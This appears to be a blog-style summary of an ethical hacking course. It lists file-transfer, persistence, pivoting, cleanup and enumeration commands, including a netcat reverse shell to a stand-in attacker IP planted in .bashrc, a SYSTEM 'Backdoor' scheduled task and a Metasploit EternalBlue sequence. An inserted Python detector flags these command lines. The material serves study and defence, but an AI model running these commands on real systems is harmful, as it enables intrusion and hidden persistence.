PEH Course 75% Complete: Key Takeaways and Practice Commands

In this update, Todd Mattran shares his progress on the Penetration Testing and Ethical Hacking (PEH) course, highlighting key topics covered and practical techniques. Below is a breakdown of the topics and verified commands for hands-on practice.

Topics Covered

1. File Transfers

  • Certutil:
    certutil -urlcache -split -f http://example.com/file.exe C:\path\to\save\file.exe
    
  • HTTP Download with PowerShell:
    Invoke-WebRequest -Uri http://example.com/file.exe -OutFile C:\path\to\save\file.exe
    
  • Linux File Transfer with wget:
    wget http://example.com/file.exe -O /path/to/save/file.exe
    
  • FTP File Transfer:
    ftp example.com
    get file.exe
    

2. Maintaining Access

  • Persistent Scripts:
    echo "nc -e /bin/bash attacker_ip 4444" >> ~/.bashrc
    
  • Scheduled Tasks (Windows):
    schtasks /create /tn "Backdoor" /tr "C:\path\to\malware.exe" /sc onstart /ru SYSTEM
    
  • Add User (Linux):
    useradd -m -s /bin/bash backdooruser
    passwd backdooruser
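
Seen from the monitoring side, the File Transfers and Maintaining Access commands above leave recognisable command lines in process-creation logs and shell history. The following is an added example, not part of the original post or the PEH course material; the rule labels, function names and sample lines are constructed for illustration.

```python
import re

# Each rule is (label, patterns); a line is flagged only when ALL patterns match,
# so reordered flags and "/" vs "-" switch prefixes still hit.
RULES = [
    ("file-transfer: certutil URL cache download",
     [r"\bcertutil(\.exe)?\b", r"[-/]urlcache\b", r"https?://"]),
    ("file-transfer: PowerShell web download to disk",
     [r"\b(invoke-webrequest|iwr)\b", r"\s-outfile\b"]),
    ("persistence: scheduled task created to run as SYSTEM",
     [r"\bschtasks(\.exe)?\b", r"/create\b", r'/ru\s+"?(nt authority\\)?system\b']),
    ("persistence: netcat started with -e (program attached to socket)",
     [r"\b(nc|ncat|netcat)\b[^|;]*\s-e\s+\S+"]),
    ("persistence: local account created",
     [r"^\s*(sudo\s+)?(\S*/)?useradd\b"]),
]
COMPILED = [(label, [re.compile(p, re.IGNORECASE) for p in pats])
            for label, pats in RULES]


def classify(cmdline):
    """Return the label of every rule whose patterns all match cmdline."""
    return [label for label, pats in COMPILED
            if all(p.search(cmdline) for p in pats)]


def triage(lines):
    """Map each flagged line to its labels; lines with no match are omitted."""
    return {line: labels for line in lines if (labels := classify(line))}


# Constructed sample: the page's commands (some with flags reordered) mixed
# with benign administration commands that must not be flagged.
SAMPLE = [
    r"certutil.exe -f -split -urlcache http://example.com/file.exe C:\path\to\save\file.exe",
    r"certutil -verify C:\certs\server.cer",
    r"powershell Invoke-WebRequest -Uri http://example.com/file.exe -OutFile C:\path\to\save\file.exe",
    r'schtasks /create /tn "Backdoor" /tr "C:\path\to\malware.exe" /sc onstart /ru SYSTEM',
    r"schtasks /query /fo LIST",
    r'echo "nc -e /bin/bash attacker_ip 4444" >> ~/.bashrc',
    r"nc -zv 192.0.2.10 22",
    r"useradd -m -s /bin/bash backdooruser",
]

if __name__ == "__main__":
    for line, labels in triage(SAMPLE).items():
        print(f"{'; '.join(labels)}\n    {line}")
```

The useradd rule fires on legitimate administration as well, so treat a hit as a prompt to check the account against change records rather than as a verdict.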
    

3. Pivoting

  • ProxyChains:
    proxychains nmap -sT -p 1-100 target_ip
    
  • SSH Tunneling:
    ssh -D 1080 user@jump_host
    
  • Nmap Scan Through Pivot:
    nmap -sT -p 1-100 target_ip --proxies socks4://127.0.0.1:1080
    
  • xfreerdp:
    xfreerdp /v:target_ip /u:username /p:password
    
  • sshuttle:
    sshuttle -r user@jump_host 192.168.1.0/24
    

4. Cleaning Up

  • Remove Executables (Linux):
    rm -f /path/to/malware
    
  • Remove Scheduled Tasks (Windows):
    schtasks /delete /tn "Backdoor" /f
    
  • Revert User Accounts:
    userdel backdooruser
    

What Undercode Say

The PEH course provides a comprehensive understanding of penetration testing, from file transfers to pivoting and maintaining access. These techniques are essential for ethical hackers to simulate real-world attacks and secure systems effectively. Below are additional commands and resources to deepen your knowledge:

  • Linux Enumeration:
    uname -a
    cat /etc/passwd
    netstat -tuln
    
  • Windows Enumeration:
    systeminfo
    net user
    netstat -ano
    
  • Web Application Enumeration:
    nikto -h http://example.com
    dirb http://example.com
    
  • Exploitation:
    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS target_ip
    exploit
    
  • Post-Exploitation:
    meterpreter > shell
    whoami
    ipconfig
    

For further learning, explore these resources:

Mastering these skills requires consistent practice and a deep understanding of both offensive and defensive strategies. Keep exploring, stay curious, and always aim to improve your craft.

This concludes the article. If you have further questions or need additional resources, feel free to reach out!
